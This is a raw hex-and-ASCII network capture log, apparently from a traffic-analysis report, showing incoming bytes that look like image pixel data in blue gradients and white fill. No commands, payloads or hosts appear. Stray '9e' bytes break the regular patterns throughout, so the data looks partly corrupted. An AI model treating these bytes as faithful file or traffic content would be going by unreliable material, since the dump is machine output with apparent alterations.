                                                                    Data Ascii: ZZ[\\]^_aaccddeeefffffffffeeeddcbba`__^]]\\[[[\\\]]^_``abbcdee
                                                                    2023-06-01 10:14:19 UTC94INData Raw: ff 14 5b b6 ff 14 5d b9 ff 14 5e bd 9e 15 60 c1 ff 15 61 c4 ff 15 62 c7 ff 15 64 ca ff 15 9e cb ff 16 65 ce ff 16 66 cf ff 16 66 d0 ff 16 66 d0 ff 16 67 d1 ff 16 67 d1 ff 16 67 d2 ff 16 67 d2 ff 16 67 d2 ff 16 67 d2 ff 9e 67 d2 ff 16 67 d2 ff 16 67 d2 ff 9e 67 d2 ff 16 67 9e ff 16 67 d1 ff 16 66 d0 ff 16 66 cf ff 9e 65 ce ff 15 64 cb ff 15 63 c9 ff 15 62 c5 ff 15 60 c1 ff 14 5e bd ff 14 5d b9 ff 14 5b b5 ff c3 d5 eb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff 9e ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff 5c 8a c4 ff 13 58 ae ff 13 5a b3 ff 14 5c b7 ff 14 5e bc ff 15 60 c0 ff 15 61
                                                                    Data Ascii: []^`abdefffggggggggggggffedcb`^][\XZ\^`a
                                                                    2023-06-01 10:14:19 UTC101INData Raw: ff 15 69 d3 ff 15 69 d2 ff 15 69 d2 ff 15 68 d1 ff 15 68 d1 ff 15 68 d0 ff 15 67 ce ff 14 66 cc ff 14 64 c8 ff 14 63 c4 ff 13 61 c0 ff 9e 5f bc ff 13 5d b7 ff 96 b6 de ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c2 d5 e9 ff 13 58 ab ff 13 5a b0 ff 13 5d b6 ff 13 5f ba ff 13 61 bf ff 14 63 c3 ff 14 64 c7 ff 14 65 cb ff 15 66 cd ff 15 67 cf ff 15 68 d1 ff 15 68 d1 ff 15 69
                                                                    Data Ascii: iiihhhgfdca_]XZ]_acdefghhi
                                                                    2023-06-01 10:14:19 UTC109INData Raw: 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 9e 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d4 ff 14 6a d3 ff 14 69 d2 ff 14 69 d2 9e 14 68 d0 ff 14 67 ce ff 13 66 cc ff 13 65 c8 ff 13 63 c4 ff 13 61 bf ff 13 5f ba ff 4d 9e 9e ff 9e ff ff ff ff ff ff ff ff ff ff 9e ff ff
                                                                    Data Ascii: jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjiihgfeca_M
                                                                    2023-06-01 10:14:19 UTC117INData Raw: ff 13 67 c9 ff 13 68 cc ff 13 69 ce ff 14 6a d1 ff 14 6b d2 ff 14 6b d3 ff 14 6c d4 ff 14 6c d4 ff 14 6c d5 ff 14 6c d5 ff 9e 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 9e 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c 9e ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 14 6c d5 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: ghijkkllllllllllllllllllllllllllll
                                                                    2023-06-01 10:14:19 UTC125INData Raw: ff 13 6b d1 ff 13 6b d2 ff 13 6b d2 ff 13 6b d1 ff 13 6a cf ff 13 69 ce ff 13 68 ca ff 13 66 c7 ff 13 64 9e ff 12 9e be ff 12 60 b8 ff 3c 7c c1 ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff d2 e0 ef ff 11 5c ae ff 11 5e b3 ff 12 61 b9 ff 12 63 be ff 13 65 c3 ff 13 67 c9 ff 13 68 cc ff 13 6a ce ff 13 6b d1 ff 13 6b d3 ff 13 6c d4 ff 13 6d d5 ff 13 6d d5 ff 13 6d d6 ff 13 6d d6 ff 13 6d d6 ff 13 6d d6 ff 13 6d d6 ff 13 6d d6 ff 13 6d d6 ff 13 6d d6 ff 13 6d d6 ff 13 6d
                                                                    Data Ascii: kkkkjihfd`<|\^aceghjkklmmmmmmmmmmmm
                                                                    2023-06-01 10:14:19 UTC133INData Raw: ff 10 5e b2 ff 95 b7 dc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 2c 71 b8 ff 11 5f b3 ff 11 62 b8 ff 11 64 be ff 12 66 c2 ff 12 68 c7 ff 12 69 ca ff 12 6b ce ff 12 6c cf ff 13 6d d2 ff 13 6d d3 ff 13 6d d4 ff 13 6d d3 ff 13 6d d2 ff 13 6c d0 ff 12 6b cf ff 9e 6a cc ff 12 68 c9 ff 12 67 c3 ff 11 64 be ff 11 62 ba ff 11 60 b4 ff e1 ea f5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                    Data Ascii: ^,q_bdfhiklmmmmmlkjhgdb`
                                                                    2023-06-01 10:14:19 UTC140INData Raw: ff 12 70 d8 ff 12 70 d8 ff 12 70 d8 ff 9e 70 d8 ff 12 70 d8 ff 12 9e d8 ff 12 70 d8 ff 12 70 d8 ff 12 70 d8 ff 12 70 d7 9e 12 70 d7 ff 12 70 d7 ff 12 70 d7 ff 12 70 d7 ff 12 70 d7 ff 12 70 d7 ff 12 70 d7 ff 12 70 d7 ff 12 70 d7 ff 12 70 d7 ff 12 70 d7 ff 12 70 d7 ff 12 6f d6 ff 12 6f d6 ff 12 6f d6 ff 12 6f d5 ff 12 6f d6 ff 12 6e d5 ff 12 6e d4 ff 12 6e d3 ff 12 6d d1 ff 11 6d d0 ff 11 9e ce ff 11 6b cc ff 11 69 ca ff 11 68 c7 ff 11 67 c3 ff 10 65 bf ff 10 64 bc ff 10 62 b8 ff 10 60 b4 ff 1d 68 b4 ff d2 e0 ef ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                    Data Ascii: pppppppppppppppppppppooooonnnmmkihgedb`h
                                                                    2023-06-01 10:14:19 UTC148INData Raw: 00 00 00 00 00 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 9e 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 9e d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 9e 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d9 ff 12 72 d8 ff 12 72 d8 ff 12 72 d8 ff 12 72 d8 ff 12 71 d7 ff 12 71 d7 ff 12 71 d7 ff 12 71 d6 ff 12 71 d6 ff 12 70 d6 ff 12 70 d6 ff 12 70 d6 ff 12 70 d5 ff 12 70 d5 ff 12 70 d5 ff 12 70 d4 ff 12 70 d4 ff 12 70 d4 ff 12 6f d3 ff 12 9e d2 ff 12 6f d2 ff 11 6e d1 ff 11 6e
                                                                    Data Ascii: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrqqqqqpppppppppoonn
                                                                    2023-06-01 10:14:19 UTC156INData Raw: ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 9e da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73 da ff 11 73
                                                                    Data Ascii: ssssssssssssssssssssssssssssssss
                                                                    2023-06-01 10:14:19 UTC164INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff 76 a6 d3 ff 0e 63 b5 ff 0e 65 ba ff 0e 68 bf ff 0f 6a c4 ff 0f 6c ca ff 0f 6e cd ff 0f 6f d0 ff 10 70 d3 ff 10 71 d5 ff 10 72 d7 ff 10 73 d8 ff 10 73 d9 ff 10 74 da ff 10 74 da ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db 9e 9e 74 db ff 10 74 db 9e 10 74 db ff 10 74 db ff 10 9e db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db 9e 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74 db ff 10 74
                                                                    Data Ascii: vcehjlnopqrssttttttttttttttttttttttttttttttttttttttttt
                                                                    2023-06-01 10:14:19 UTC172INData Raw: ff 0f 74 d8 ff 0f 74 d8 ff 0f 74 d8 ff 0f 74 d7 ff 0f 73 d5 9e 0f 72 d3 ff 0e 71 d2 ff 0e 70 d0 ff 0e 6f cd ff 0e 6e cb ff 0e 6c c7 ff 0e 6a c3 ff 0d 69 bf ff 0d 67 9e ff 0d 65 9e ff 3a 80 c1 ff ef f5 fa ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff 58 93 ca ff 0d 65 b7 ff 0d 67 9e ff 0e 69 c0 ff 0e 6b c5 ff 0e 6d ca ff 0e 6f cd ff 0e 71 d1 ff 0f 72 d3 ff 0f 73 d6 ff 0f 74 d8 ff 0f 74
                                                                    Data Ascii: ttttsrqponljige:Xegikmoqrstt
                                                                    2023-06-01 10:14:19 UTC179INData Raw: ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ef f5 fa ff a3 c4 e4 ff 2a 79 c1 ff 0d 67 bb ff 0d 69 be ff 0d 6a c0 ff 0e 6b c3 ff 0e 6c c5 ff 0e 6d c8 ff 0e 6e cb ff 0e 6f cd ff 0e 70 ce ff 0e 71 d1 ff 0e 72 d2 ff 0e 72 d3 ff 0f 73 d5 ff 0f 74 d6 ff 0f 74 d7 ff 0f 75 d8 ff 0f 75 d9 ff 0f 75 d9 ff 0f 75 d9 ff 0f 75 d9 ff 0f 75 d8 ff 0f 74 d7 ff 0f 73 d5 ff 0f 73 d4 ff 0e 72 d3 ff 0e 71 d1 ff 0e 70 ce ff 0e 6f cc ff 0e 6e c9 ff 0e 6c c5 ff 0e 6a c1 ff 0d 69 bf ff 0d 67 9e ff 0d 65 b7 ff 48 8a c5 ff ef f5 fa ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff
                                                                    Data Ascii: *ygijklmnopqrrsttuuuuuutssrqponljigeH
                                                                    2023-06-01 10:14:19 UTC187INData Raw: ff 0e 79 de ff 0e 79 de ff 0e 79 de ff 0e 79 de ff 0e 9e de ff 0e 79 de ff 0e 79 de ff 0e 79 de ff 0e 79 de ff 0e 79 de ff 0e 79 de ff 0e 79 de 9e 0e 79 de ff 0e 79 de ff 0e 79 de ff 0e 79 de ff 0e 79 de ff 0e 79 de ff 0e 79 de ff 0e 79 de ff 0e 79 dd ff 0e 79 dd ff 0e 79 dd ff 0e 78 dc ff 0e 78 db ff 0e 78 db ff 0e 77 db ff 0e 76 d9 ff 0e 76 d8 ff 0e 75 d6 ff 0e 75 d5 ff 0d 74 d4 ff 0d 73 d3 ff 9e 73 d1 ff 0d 72 d0 ff 0d 72 ce ff 0d 71 cd ff 0d 71 cd ff 0d 70 cc ff 0d 70 cb ff 0d 6f ca ff 0d 6f ca ff 0d 6f ca ff 0d 6f ca ff 0d 6f ca ff 0d 6f ca ff 0d 6f ca 9e 0d 70 cb ff 0d 70 cc ff 0d 70 cc 9e 0d 71 cd ff 0d 71 cd ff 0d 71 cd ff 0d 72 ce ff 0d 72 cf ff 0d 72 d0 ff 0d 73 d1 ff 0d 73 d2 ff 0d 73 d3 ff 0d 74 d4 ff 0e 74 d4 ff 0e 75 d5 ff 0e 75 d5 ff 0e 75
                                                                    Data Ascii: yyyyyyyyyyyyyyyyyyyyyyxxxwvvuutssrrqqppooooooopppqqqrrrsssttuuu
                                                                    2023-06-01 10:14:19 UTC195INData Raw: ff 0d 7a de ff 0d 7a de ff 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 9e 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a de ff 0d 7a
                                                                    Data Ascii: zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
                                                                    2023-06-01 10:14:19 UTC203INData Raw: ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df 9e 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 0d 7b df ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00
                                                                    Data Ascii: {{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
                                                                    2023-06-01 10:14:19 UTC211INData Raw: ff 0b 70 c7 ff 0b 72 ca ff 0b 74 cd ff 0b 75 cf ff 0b 76 d2 ff 0b 77 d5 ff 0c 78 d6 ff 0c 79 d8 ff 0c 7a da ff 0c 7b dc ff 0c 7b dd ff 0c 7c dd ff 0c 7c de ff 0c 7c de ff 0c 7d df ff 0c 7d df ff 0c 7d df ff 0c 7d e0 ff 0c 7d e0 9e 0c 9e e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 9e 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 9e e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 9e e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d e0 ff 0c 7d
                                                                    Data Ascii: prtuvwxyz{{|||}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
                                                                    2023-06-01 10:14:19 UTC219INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ef f5 fa ff 83 b4 dc 9e 18 75 c0 ff 0a 6d be ff 0a 6f c2 ff 0a 70 c5 ff 0a 9e c8 ff 0a 73 cb ff 0a 74 ce ff 0a 76 d0 ff 0a 77 d3 ff 0b 78 d5 ff 0b 79 d6 ff 0b 7a d8 9e 0b 7a da ff 0b 7b dc ff 0b 7c dd ff 0b 7c dd ff 0b 7d de ff 0b 7d df ff 0b 7d df ff 9e 7e e0 ff 0b 7e e0 ff 0b 7e e0 ff 0b 7e e1 ff 0b 7e e1 ff 0b 7e e1 ff 0b 7e e1 ff 0b 7e e1 ff 0b 7e e1 ff 0b 7e e1 ff 0b 7e e1 ff 0b 7e e1 ff 0b 7e
                                                                    Data Ascii: umopstvwxyzz{||}}}~~~~~~~~~~~~~
                                                                    2023-06-01 10:14:19 UTC226INData Raw: ff 0a 7f e1 ff 0a 7f e0 ff 0a 7f df ff 0a 7e de ff 0a 7c db ff 0a 7b d8 ff 0a 7a d6 ff 09 78 d1 ff 09 75 cd ff 09 73 c8 ff ef f6 fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d1 ea ff 55 9b
                                                                    Data Ascii: ~|{zxusU
                                                                    2023-06-01 10:14:19 UTC234INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 9e 9e e3 ff 6a b6 f1 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 9e 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 e3 ff 0a 81 9e ff 9e 81 e3 ff 0a 80 e2 ff 0a 81 e2 ff 0a 80 e1 ff 0a 80 e1 ff 0a 80 e0 ff 0a 7f df 9e 0a 7e de ff 0a 7d dc ff 0a 7d da ff 0a 9e d8 ff 0a 7a d6 ff 09 7a d4 ff 09 78 d1 ff 09 77
                                                                    Data Ascii: j~}}zzxw
                                                                    2023-06-01 10:14:19 UTC242INData Raw: ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 9e e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 9e e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 14 89 e5 ff be e6 fd ff cc ed ff ff 2c 96 e9 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 09 83 e4 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: ,
                                                                    2023-06-01 10:14:19 UTC250INData Raw: ff 08 84 e5 ff 08 84 e5 ff 9e 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 9e 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 9e 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 9e ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84 e5 ff 08 84
                                                                    Data Ascii:
                                                                    2023-06-01 10:14:19 UTC258INData Raw: 9e 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 9e ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 9e 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 9e e6 ff 9e 85 e6 ff 08 85 e6 ff 08 85 e6 ff 9e 85 e6 ff 08 85 9e ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 9e ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85 e6 ff 08 85
                                                                    Data Ascii:
